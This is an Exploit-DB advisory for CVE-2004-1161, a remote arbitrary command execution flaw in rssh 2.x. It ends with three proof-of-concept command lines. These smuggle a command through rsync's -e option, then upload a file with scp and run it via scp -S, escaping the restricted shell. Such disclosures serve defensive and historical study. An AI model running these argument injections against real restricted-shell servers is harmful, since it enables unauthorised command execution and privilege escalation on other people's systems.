RSSH 2.x - Remote Arbitrary Command Execution Vulnerability

ID EDB-ID:24795
Type exploitdb
Reporter Jason Wies
Modified 2004-12-02T00:00:00


RSSH 2.x Remote Arbitrary Command Execution Vulnerability. CVE-2004-1161. Remote exploit for linux platform


rssh is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.

All versions of rssh are considered vulnerable at the moment.

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp' 

scp restricteduser@remotehost:/tmp/ 

ssh restricteduser@remotehost 'scp -S /tmp/ localhost:/dev/null /tmp'